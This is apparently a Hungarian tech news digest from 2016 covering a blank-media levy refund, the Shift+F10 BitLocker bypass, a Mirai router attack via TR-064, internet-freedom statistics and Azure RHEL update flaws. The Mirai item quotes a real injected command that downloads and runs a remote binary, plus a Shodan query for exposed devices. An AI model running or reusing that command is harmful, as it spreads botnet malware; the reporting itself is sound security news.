HUP cikkturkáló

Visszaigényelhető lesz az "Artijust" adó

444.hu: Visszakaphatod a hordozói díjat, ha nem lopott zenét másolsz ki

Azért nem kapkodnak nagyon: "Az Artisjus az MTI-nek azt mondta, hogy a közös jogkezelők 2017. végéig egy tájékoztató honlapot indítanak az üres hordozó díjról és annak visszatérítési lehetőségeiről."

Addigra talán már pont nem vesz senki üres CD-t. ;) (Igen, tudom, persze, pendrive, HDD.)

Press Shift+F10 to bypass Bitlocker

Security researcher Sami Laiho discovered this simple method of bypassing BitLocker, wherein an attacker can open a command-line interface with System privileges just by holding SHIFT+F10 while a Windows 10 PC is installing a new OS build.

http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
http://thehackernews.com/2016/11/windows-bitlocker-bypass.html

New Mirai attack vector – bot exploits a recently discovered router vulnerability

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
[...]
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.
https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-di…

Magyarországon 176157 IP esetében érhető el az Internet felől az érintett 7547-es port.

via https://www.shodan.io/search?query=port%3A7547+country%3Ahu

Internet freedom declined in 2016 for the sixth consecutive year.

https://freedomhouse.org/report/freedom-net/freedom-net-2016

  • Two-thirds of all internet users – 67 percent – live in countries where criticism of the government, military, or ruling family are subject to censorship.
  • Social media users face unprecedented penalties, as authorities in 38 countries made arrests based on social media posts over the past year. Globally, 27 percent of all internet users live in countries where people have been arrested for publishing, sharing, or merely “liking” content on Facebook.
  • Governments are increasingly going after messaging apps like WhatsApp and Telegram, which can spread information quickly and securely.

In January 2016, the European Court of Human Rights found that Hungary’s internet and telecommunication surveillance practices violate the European Convention on Human Rights (see Surveillance, Privacy, and Anonymity).

Microsoft update servers left all Azure RHEL instances hackable

"Microsoft has patched flaws that attackers could exploit to compromise all Azure Red Hat Enterprise Linux (RHEL) instances.

Software engineer Ian Duffy found the flaws while building a secure RHEL image for Microsoft Azure. During that process he noticed an installation script Azure uses in its preconfigured RPM Package Manager contains build host information that allows attackers to find all four Red Hat Update Appliances which expose REST APIs over HTTPS.

From there Duffy found a package labelled PrepareRHUI (Red Hat Update Infrastructure) that runs on all Azure RHEL boxes, and contains the rhui-monitor.cloud build host."

Microsoft update servers left all Azure RHEL instances hackable